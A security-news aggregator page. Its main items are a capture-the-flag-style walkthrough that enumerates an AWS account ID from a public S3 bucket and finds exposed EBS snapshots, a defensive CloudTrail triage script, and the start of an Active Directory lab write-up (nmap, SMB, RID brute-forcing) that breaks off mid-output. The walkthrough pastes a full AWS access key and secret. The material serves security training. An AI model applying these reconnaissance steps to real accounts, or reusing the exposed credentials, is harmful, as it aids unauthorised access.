Security News
The latest news for cybersecurity collected from vast security websites.
2025-02-19 10:18:00
CISA Adds Palo Alto Networks and SonicWall Flaws to Exploited Vulnerabilities List
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting Palo Alto Networks PAN-OS and SonicWall SonicOS SSLVPN to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The flaws are listed below - CVE-2025-0108 (CVSS score: 7.8) - An authentication bypass vulnerability in the Palo Alto Networks PAN-OS
by The Hacker News
2025-02-19 06:24:17
U.S. CISA adds SonicWall SonicOS and Palo Alto PAN-OS flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SonicOS and Palo Alto PAN-OS vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple iOS and iPadOS and Mitel SIP Phones vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are: Researchers recently warned that threat actors […]
by Security Affairs
2025-02-19 06:00:40
Kunai: Open-source threat hunting tool for Linux
Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. “What sets Kunai apart is its ability to go beyond simple event generation. While most security monitoring tools rely on syscalls or kernel function hooking, Kunai takes a more advanced approach by correlating events on the host and providing enriched insights. This means fewer but more meaningful events, reducing noise and the strain on log ingestion while delivering deeper visibility … More →
by Help Net Security
2025-02-19 05:30:34
VC-backed cybersecurity startups and the exit crunch
The cybersecurity startup landscape is at a crossroads. As venture-backed companies strive for successful exits, the bar has risen dramatically, requiring more funding, higher revenue, and faster growth than ever before. In this Help Net Security video, Mark Kraynak, Founding Partner at Acrew Capital, breaks down the Exit Escape Velocity for Cybersecurity Startups report to explore the challenges of IPOs and M&A deals in the post-COVID era.
by Help Net Security
2025-02-19 05:15:15
Identify the AWS Account ID from a Public S3 Bucket

Picture by Leonardo AI | AWS

Scenario

The ability to expose and leverage even the smallest oversights is a coveted skill. A global logistics company has reached out to our cybersecurity company for assistance and has provided the IP address of their website. Your objective? Start the engagement and use this IP address to identify their AWS account ID via a public S3 bucket so we can commence the process of enumeration.

Lab prerequisites
- Basic Linux command line knowledge

Learning outcomes
- Knowledge of a technique that can be used to find AWS Account IDs
- Understanding what a tool does by performing a code review

Difficulty: Foundations
Focus: Red

Real-world context

If threat actors get their hands on an AWS Account ID, they can try to identify the IAM roles and users tied to that account. They can do this by taking advantage of detailed error messages that AWS services return when inputting an incorrect username or role name. These messages can verify if an IAM user or role exists, which can help threat actors compile a list of possible targets in the AWS account. It’s also possible to filter public EBS and RDS snapshots by the AWS Account ID that owns them.

Enumeration

The scan shows that port 53 (TCP) is open and running ISC BIND 9.16.23 on RedHat Linux. Port 80 (TCP) is also open, hosting an Apache HTTP server (version 2.4.52) on Ubuntu. The server’s title is ‘Mega Big Tech,’ and the HTTP response headers confirm it’s running Apache 2.4.52 on Ubuntu.

┌──(root㉿kali)-[/home/kali/AWS]
└─# nmap -sC -sV -A 54.204.171.32 -T4
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 17:47 EST
Nmap scan report for ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)
Host is up (0.13s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
53/tcp open  domain  ISC BIND 9.16.23 (RedHat Linux)
| dns-nsid: 
|_  bind.version: 9.16.23-RH
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Mega Big Tech
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X|5.X (87%), MikroTik RouterOS 7.X (87%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.14 (87%), Linux 3.4 - 3.10 (87%), Linux 4.15 (87%), Linux 4.15 - 5.19 (87%), Linux 4.19 (87%), Linux 5.0 - 5.14 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 25 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   13.63 ms  192.168.0.1
2   15.48 ms  10.14.161.1
3   ... 4
5   19.71 ms  10.240.254.53
6   ... 8
9   18.36 ms  10.200.22.1
10  17.00 ms  static-65.115.194.14-tataidc.co.in (14.194.115.65)
11  9.34 ms   10.124.248.81
12  11.21 ms  115.113.172.125.static-kolkata.vsnl.net.in (115.113.172.125)
13  82.12 ms  172.28.176.253
14  188.48 ms ix-ae-0-100.tcore1.mlv-mumbai.as6453.net (180.87.38.5)
15  246.71 ms if-be-13-2.ecore1.mlv-mumbai.as6453.net (180.87.38.29)
16  322.19 ms if-be-47-2.ecore1.emrs2-marseille.as6453.net (80.231.217.52)
17  326.42 ms if-bundle-15-2.qcore1.pye-paris.as6453.net (80.231.154.32)
18  ...
19  340.08 ms 63.243.137.148
20  ... 24
25  279.83 ms ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.86 seconds

Web Page

This brings us to the website for Mega Big Tech. There doesn’t appear to be any noteworthy functionality, so let’s take a look at the source code.

<section class="product-mac">
  <div class="container">
    <h2>WorkPro</h2>
    <div class="grid">
      <div class="grid-product">
        <img src="https://mega-big-tech.s3.amazonaws.com/images/workpro1.jpg">
        <div class="grid-detail">
          <p>WorkPro</p>
          <p>From $5,000</p>
        </div>
      </div>

This shows that the images are hosted on an Amazon S3 bucket named ‘mega-big-tech’. Requesting the bucket itself returns a listing:

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>mega-big-tech</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated>
<Contents><Key>images/</Key><LastModified>2023-06-25T22:40:57.000Z</LastModified><ETag>&quot;d41d8cd98f00b204e9800998ecf8427e&quot;</ETag><Size>0</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/banner.jpg</Key><LastModified>2023-06-25T22:42:34.000Z</LastModified><ETag>&quot;3ad5c014c01ffeb0743182379d2cd80d&quot;</ETag><Size>3184176</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/notepro1.jpg</Key><LastModified>2023-06-25T22:42:35.000Z</LastModified><ETag>&quot;f5435f26a11fac38006d8fe32ed75045&quot;</ETag><Size>941294</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/notepro2.jpg</Key><LastModified>2023-06-25T22:42:36.000Z</LastModified><ETag>&quot;c7b217afa365714334597643889c5daa&quot;</ETag><Size>1660205</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/notepro3.jpg</Key><LastModified>2023-06-25T22:42:37.000Z</LastModified><ETag>&quot;11acc403ec7efabdf2743404e1fc6be7&quot;</ETag><Size>490794</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/notepro4.jpg</Key><LastModified>2023-06-25T22:42:38.000Z</LastModified><ETag>&quot;2ba1a84a0908e91bec8d05981c28fc40&quot;</ETag><Size>2415092</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/phonepro1.jpg</Key><LastModified>2023-06-25T22:42:39.000Z</LastModified><ETag>&quot;8b2541f6138dd34e392f45fc6ab8ba6f&quot;</ETag><Size>1003564</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/phonepro2.jpg</Key><LastModified>2023-06-25T22:42:40.000Z</LastModified><ETag>&quot;f9bf19e16a9a31a6754d7c55d0576ec4&quot;</ETag><Size>1277058</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/phonepro3.jpg</Key><LastModified>2023-06-25T22:42:41.000Z</LastModified><ETag>&quot;c5e3b974eb2a8cc3cb6cd7f14a358419&quot;</ETag><Size>2322525</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/phonepro4.jpg</Key><LastModified>2023-06-25T22:42:42.000Z</LastModified><ETag>&quot;e77b77f088be31b907562c1c08d3c1ea&quot;</ETag><Size>4080373</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/watchpro1.jpg</Key><LastModified>2023-06-25T22:42:43.000Z</LastModified><ETag>&quot;8c6b69baa95f5a7ed0f9d2e1dae73160&quot;</ETag><Size>1160096</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/watchpro2.jpg</Key><LastModified>2023-06-25T22:42:44.000Z</LastModified><ETag>&quot;ab66d316fbdfa90eea53e89855dc243f&quot;</ETag><Size>2877784</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/watchpro3.jpg</Key><LastModified>2023-06-25T22:42:46.000Z</LastModified><ETag>&quot;a105349b350b257b05438dbc1c8fbe4d&quot;</ETag><Size>3232387</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/watchpro4.jpg</Key><LastModified>2023-06-25T22:42:47.000Z</LastModified><ETag>&quot;f5315cb77b5de5a74c13417e185d3953&quot;</ETag><Size>3041540</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/watchpro5.jpg</Key><LastModified>2023-06-25T22:42:49.000Z</LastModified><ETag>&quot;f137be90eec86dd71da37f25bdc5452e&quot;</ETag><Size>3400957</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/workpro1.jpg</Key><LastModified>2023-06-25T22:42:50.000Z</LastModified><ETag>&quot;ee9140f394608d8ed638c9b39b9c1c4f&quot;</ETag><Size>1632585</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/workpro2.jpg</Key><LastModified>2023-06-25T22:42:51.000Z</LastModified><ETag>&quot;fd33607a6406f4a6cb1550cba96ea200&quot;</ETag><Size>1081259</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/workpro3.jpg</Key><LastModified>2023-06-25T22:42:54.000Z</LastModified><ETag>&quot;78fec3d6d2c81294346fa618ba0caf00&quot;</ETag><Size>1599810</Size><StorageClass>STANDARD</StorageClass></Contents>
<Contents><Key>images/workpro4.jpg</Key><LastModified>2023-06-25T22:42:56.000Z</LastModified><ETag>&quot;9a70d62b2f2bd2bf6604943bde09f6bd&quot;</ETag><Size>1144134</Size><StorageClass>STANDARD</StorageClass></Contents>
</ListBucketResult>

Checking the bucket in the browser reveals an ‘images’ directory containing more images, but nothing particularly interesting.

Once we have the S3 bucket name, we can try to determine the AWS Account ID that owns it. Security researcher Ben Bridts has shown that brute-forcing an AWS Account ID for an S3 bucket is possible. You can read his research post and review the code here for more details.

The core idea is that the script creates a policy leveraging the s3:ResourceAccount policy condition key, which evaluates whether access should be granted based on the AWS account tied to the S3 bucket. Instead of randomly guessing billions of account IDs, the script reduces the search space by matching the account ID with a wildcard pattern one digit at a time. Each correctly identified digit is stored, and the process continues until the full account ID is discovered.

For this task, we have provided a user with a role that can be assumed to perform the attack. However, if you prefer to set up the user and role yourself, the necessary policies are listed below.

The IAM user taking on the role must have the following policy attached.

{
    "Version": "2012-10-17",
    "Statement": {
        "Effect": "Allow",
        "Action": "sts:AssumeRole",
        "Resource": "arn:aws:iam::<your aws account id>:role/<your role name>"
    }
}

The role your user can assume has a policy that grants s3:GetObject and s3:ListBucket permissions for the mega-big-tech bucket.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Enum",
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::mega-big-tech/*"
        },
        {
            "Sid": "Enum1",
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::mega-big-tech"
        }
    ]
}

The role would also include the following trust policy, which permits the user to take on the role.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<your aws account id>:user/s3enum"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

We’ll use our existing user moving forward. Start by setting the provided credentials with aws configure. This allows us to execute commands as the user who can assume the role with the s3:GetObject and s3:ListBucket permissions. Assuming a role with one of these permissions is necessary for the script to work.

┌──(root㉿kali)-[/home/kali/AWS]
└─# aws configure
AWS Access Key ID [****************FGCD]: AKIAWHEOTHRFW4CEP7HK
AWS Secret Access Key [****************Y6jP]: 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
Default region name [us-east-1]: 
Default output format [None]: 

┌──(root㉿kali)-[/home/kali/AWS]
└─# aws sts get-caller-identity
{
    "UserId": "AIDAWHEOTHRF62U7I6AWZ",
    "Account": "427648302155",
    "Arn": "arn:aws:iam::427648302155:user/s3user"
}

First, create a virtual environment to install the s3-account-search tool. Follow these steps:

1. Install the Python virtual environment package: sudo apt install python3-venv
2. Create a new virtual environment: python3 -m venv venv
3. Activate the virtual environment: source venv/bin/activate
4. Install the s3-account-search tool: pip install s3-account-search

Once that’s done, you can proceed to provide the Amazon Resource Name (ARN) of the role under your control (in your AWS account) and specify the target S3 bucket in the AWS account whose ID you want to enumerate. The command will look like this:

s3-account-search arn:aws:iam::427648302155:role/LeakyBucket mega-big-tech

┌──(venv)─(root㉿kali)-[/home/kali]
└─# s3-account-search arn:aws:iam::427648302155:role/LeakyBucket mega-big-tech
Starting search (this can take a while)
found: 1
found: 10
found: 107
found: 1075
found: 10751
found: 107513
found: 1075135
found: 10751350
found: 107513503
found: 1075135037
found: 10751350379
found: 107513503799

This reveals the AWS account ID 107513503799. We can use this information to search for publicly exposed resources, such as public EBS or RDS snapshots, that might have been unintentionally shared by the account owner.

To proceed, it’s essential to identify the AWS region where the S3 bucket resides, as public snapshots are only visible in the region they were created in. If the S3 bucket is in a particular region, other resources could also be exposed there.

To find the region of the S3 bucket, we can use a simple cURL trick.

┌──(kali㉿kali)-[~]
└─$ curl -I https://mega-big-tech.s3.amazonaws.com
HTTP/1.1 200 OK
x-amz-id-2: wvNpGkjc19GcRdsMvlsrHvB5H9Z+LY1ZTAYT0ce2mAsEd1HjBDCD+jBPFe+kBlImpJme2BamURM=
x-amz-request-id: WZPV5AW4P7XFRQN8
Date: Mon, 17 Feb 2025 23:52:47 GMT
x-amz-bucket-region: us-east-1
x-amz-access-point-alias: false
Content-Type: application/xml
Transfer-Encoding: chunked
Server: AmazonS3

In the response headers, we can see that x-amz-bucket-region is set to us-east-1, which corresponds to North Virginia.

Now, log into the AWS Management Console using your personal AWS account and ensure that the us-east-1 region is selected.

[Screenshot: Console Home]

Next, search for the EC2 service in the AWS Management Console. Click on the service, and in the EC2 dashboard, navigate to the left-hand menu. Under the Elastic Block Store section, select Snapshots. In the dropdown list, choose Public snapshots, then paste the discovered AWS account ID into the field and hit Enter/Return. After a brief wait, you’ll get a result showing that the company has a publicly exposed EBS snapshot! PWNED!

[Screenshot: Snapshots]

The objective of this lab is to identify the AWS account ID associated with the S3 bucket, which will serve as the flag.

Additionally, you can use the following CLI command to list public EBS snapshots created in the AWS account:

aws ec2 describe-snapshots --owner-ids 107513503799 --query 'Snapshots[]' --region=us-east-1

[Screenshot: Snapshots in CLI]

Although AWS account IDs are not inherently sensitive — often appearing in public documentation or source code — they can still be useful in a security assessment. Identifying an organization’s AWS account ID can help pinpoint public resources or uncover potential misconfigurations tied to that account.

From a detection standpoint, the STS actions used in this method are executed within the enumerator’s AWS account. As a result, these actions do not generate logs that the S3 bucket owner can view. However, for improved monitoring, the bucket owner can enable S3 data events, albeit at an additional cost, to log access attempts and other relevant activities.

I hope you enjoyed this writeup! Happy Hacking :)

Subscribe to me on Medium and be sure to turn on email notifications so you never miss out on my latest walkthroughs, write-ups, and other informative posts.

Follow me on the social media below:
1. LinkedIn: Reju Kole
2. Instagram: reju.kole.9
3. Respect me on HackTheBox!: Hack The Box :: User Profile
4. Check my TryHackMe profile: TryHackMe | W40X
5. Twitter | X: @Mr_W40X
6. GitHub: W40X | Reju Kole | Security Researcher

In case you need any help, feel free to message me on my social media handles.

Identify the AWS Account ID from a Public S3 Bucket was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
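The write-up above closes on the detection angle: the enumerator's STS calls happen in its own account, so the only trace the bucket owner can get is from S3 data events on the bucket. The script below, an added example and not code from the write-up or from s3-account-search, shows what triage of those events looks like: it reads a CloudTrail delivery file, drops everything that is not an S3 call against the bucket, and summarises callers that are not the bucket owner. The bucket name and owner account are the values from the write-up; the records, IP addresses, the principal id and the "deploy" user are constructed, and the representation of anonymous requests is a simplification.

```python
"""
Triage of CloudTrail S3 data events for one bucket: leave the bucket owner's own
traffic aside and summarise every other caller (anonymous or from another account).
Added example built on constructed records; not code from the write-up.
"""
import json
from collections import Counter

# Bucket owner account and bucket name are the values from the write-up.
BUCKET_OWNER_ACCOUNT = "107513503799"
BUCKET = "mega-big-tech"

# Constructed CloudTrail delivery file.  Field names follow CloudTrail's record
# format.  A cross-account caller is shown the way the bucket owner's trail presents
# it (type AWSAccount with accountId and principalId, no role ARN); the principal id,
# IPs, times and the "deploy" user are made up, and the anonymous record is a
# simplification (accountId "anonymous").
SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    {"eventTime": "2025-02-17T23:40:01Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListObjects", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AWSAccount", "principalId": "AROAEXAMPLE0000000001:enum",
                      "accountId": "427648302155"},
     "requestParameters": {"bucketName": BUCKET},
     "recipientAccountId": BUCKET_OWNER_ACCOUNT},
    {"eventTime": "2025-02-17T23:40:02Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AWSAccount", "principalId": "AROAEXAMPLE0000000001:enum",
                      "accountId": "427648302155"},
     "requestParameters": {"bucketName": BUCKET, "key": "images/banner.jpg"},
     "errorCode": "AccessDenied",
     "recipientAccountId": BUCKET_OWNER_ACCOUNT},
    {"eventTime": "2025-02-17T23:41:10Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "AWSAccount", "principalId": "", "accountId": "anonymous"},
     "requestParameters": {"bucketName": BUCKET, "key": "images/workpro1.jpg"},
     "recipientAccountId": BUCKET_OWNER_ACCOUNT},
    {"eventTime": "2025-02-17T23:42:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject", "sourceIPAddress": "192.0.2.15",
     "userIdentity": {"type": "IAMUser", "accountId": BUCKET_OWNER_ACCOUNT,
                      "arn": "arn:aws:iam::107513503799:user/deploy", "userName": "deploy"},
     "requestParameters": {"bucketName": BUCKET, "key": "images/watchpro6.jpg"},
     "recipientAccountId": BUCKET_OWNER_ACCOUNT},
    {"eventTime": "2025-02-17T23:43:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListObjects", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AWSAccount", "principalId": "AROAEXAMPLE0000000001:enum",
                      "accountId": "427648302155"},
     "requestParameters": {"bucketName": "some-other-bucket"},
     "recipientAccountId": BUCKET_OWNER_ACCOUNT},
    {"eventTime": "2025-02-17T23:43:30Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "192.0.2.15",
     "userIdentity": {"type": "IAMUser", "accountId": BUCKET_OWNER_ACCOUNT,
                      "arn": "arn:aws:iam::107513503799:user/deploy", "userName": "deploy"},
     "recipientAccountId": BUCKET_OWNER_ACCOUNT},
]})


def load_s3_records(raw_json, bucket=BUCKET):
    """Parse a CloudTrail delivery file ({"Records": [...]}) and keep only the S3
    records whose request targets `bucket`."""
    records = json.loads(raw_json)["Records"]
    return [r for r in records
            if r.get("eventSource") == "s3.amazonaws.com"
            and r.get("requestParameters", {}).get("bucketName") == bucket]


def caller_class(record, owner_account=BUCKET_OWNER_ACCOUNT):
    """Classify the caller relative to the bucket owner: the caller's account is in
    userIdentity.accountId, the bucket owner's account in recipientAccountId."""
    acct = record.get("userIdentity", {}).get("accountId")
    if acct in (None, "", "anonymous"):
        return "anonymous"
    return "owner" if acct == owner_account else "cross-account"


def summarize_external_callers(records, owner_account=BUCKET_OWNER_ACCOUNT):
    """Return {caller_account: summary} for every caller that is not the bucket owner.
    One external account issuing repeated ListBucket/GetObject calls against the
    bucket, some of them denied, is the footprint that role-based bucket access
    from another account leaves in the owner's data events."""
    summary = {}
    for r in records:
        cls = caller_class(r, owner_account)
        if cls == "owner":
            continue
        acct = r["userIdentity"].get("accountId") or "anonymous"
        s = summary.setdefault(acct, {"class": cls, "calls": 0, "denied": 0,
                                       "actions": Counter(), "source_ips": set()})
        s["calls"] += 1
        s["denied"] += 1 if r.get("errorCode") else 0
        s["actions"][r["eventName"]] += 1
        s["source_ips"].add(r.get("sourceIPAddress"))
    return summary


if __name__ == "__main__":
    for acct, s in summarize_external_callers(load_s3_records(SAMPLE_CLOUDTRAIL)).items():
        print(f"{acct:>14} {s['class']:<14} calls={s['calls']} denied={s['denied']} "
              f"actions={dict(s['actions'])} ips={sorted(s['source_ips'])}")
```

Anonymous GetObject traffic is expected on a bucket that serves a public website, so the interesting row is the one keyed by a foreign account id; pivoting on that account id across all buckets in the trail tells you whether it is a partner integration or something to look into. None of this is visible unless data events are enabled for the bucket, which is the point the write-up makes.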
2025-02-19 05:14:57
OTP Login Rate Limit Bypass — The Easiest Bug for Beginners to Discover
“This story was originally published on my previous Medium account, which was unfortunately deleted. The original post garnered…
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-19 05:11:19
How I Earned a Hall of Fame Spot at UNESCO by Bypassing 403 Forbidden
Hello, amazing people and bug bounty hunters! 👋
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-19 05:09:38
Unverified Email Change Flaw on Apps.Target.com: A Sneaky Account Takeover Trick
READ IT FOR FREE
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-19 05:08:33
Ever Found a Valid Bug/Leaks in JavaScript Files in Bug Bounties?
Common Mistakes and Practical Techniques to Tackle them to Find Valid Bugs/Leaks in JS Files
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-19 05:05:49
Retro

Retro | VulnLab

And here we go again! It’s Maverick, back with another VulnLab machine — this time diving into AD CS, specifically ESC1.

Now, if you don’t know what AD CS is… well, where have you been? 😆 Back in 2021, Will Schroeder and Lee Chagolla-Christensen dropped an absolute banger of a research paper on Active Directory Certificate Services (AD CS) attacks. I highly recommend checking out their blog and research paper (“Certified Pre-Owned: Abusing Active Directory Certificate Services”); it’s a goldmine for anyone interested in AD security.

Let’s kick things off with an Nmap scan to uncover the open ports and running services on the target.

nmap -sCV 10.10.124.218 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 20:48 EET
Nmap scan report for 10.10.124.218
Host is up (0.56s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-17 18:54:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2025-02-17T18:44:38
|_Not valid after:  2026-02-17T18:44:38
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2025-02-17T18:44:38
|_Not valid after:  2026-02-17T18:44:38
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2025-02-17T18:44:38
|_Not valid after:  2026-02-17T18:44:38
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2025-02-17T18:44:38
|_Not valid after:  2026-02-17T18:44:38
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-02-17T18:55:29+00:00
|_ssl-date: 2025-02-17T18:56:07+00:00; +5m35s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-02-16T18:53:28
|_Not valid after:  2025-08-18T18:53:28
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5m34s, deviation: 0s, median: 5m34s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-02-17T18:55:28
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.40 seconds

So, what do we have? We have Kerberos, LDAP, DNS, and SMB. Let’s enumerate them one by one in detail. Are you ready? The journey is beginning!

SMB

Checking SMB anonymous login using smbclient.

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# smbclient -L //10.10.124.218//
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Notes           Disk      
        SYSVOL          Disk      Logon server share
        Trainees        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.124.218 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# nxc smb 10.10.124.218 -u user -p user
SMB         10.10.124.218   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.124.218   445    DC               [+] retro.vl\user:user (Guest)

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# smbclient //10.10.124.218/Trainees -U test
Password for [WORKGROUP\test]:
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
mkfifo         more           mput           newer          notify         
open           posix          posix_encrypt  posix_open     posix_mkdir    
posix_rmdir    posix_unlink   posix_whoami   print          prompt         
put            pwd            q              queue          quit           
readlink       rd             recurse        reget          rename         
reput          rm             rmdir          showacls       setea          
setmode        scopy          stat           symlink        tar            
tarmode        timeout        translate      unlock         volume         
vuid           wdel           logon          listconnect    showconnect    
tcon           tdis           tid            utimes         logoff         
..             !              
smb: \> ls
  .                                   D        0  Mon Jul 24 00:58:43 2023
  ..                                DHS        0  Wed Jul 26 12:54:14 2023
  Important.txt                       A      288  Mon Jul 24 01:00:13 2023

                6261499 blocks of size 4096. 2220912 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> 

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards
The Admins

After finding “trainee” in SMB and investigating further, I checked their shared files and validated their existence as users. At this point, I like to check for a RID cycling attack — it often gives me great results for discovering valid users to enumerate further. I used NetExec for this because, as I’ve mentioned before in my write-ups, it’s the Swiss Army knife of tools—I absolutely love it!

┌──(root㉿kali)-[/home/kali/VulnLab/retero_1]
└─# nxc smb 10.10.124.218 -u trainee -p 'trainee' --rid-brute 10000
SMB         10.10.124.218   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.124.218   445    DC               [+] retro.vl\trainee:trainee 
SMB         10.10.124.218   445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
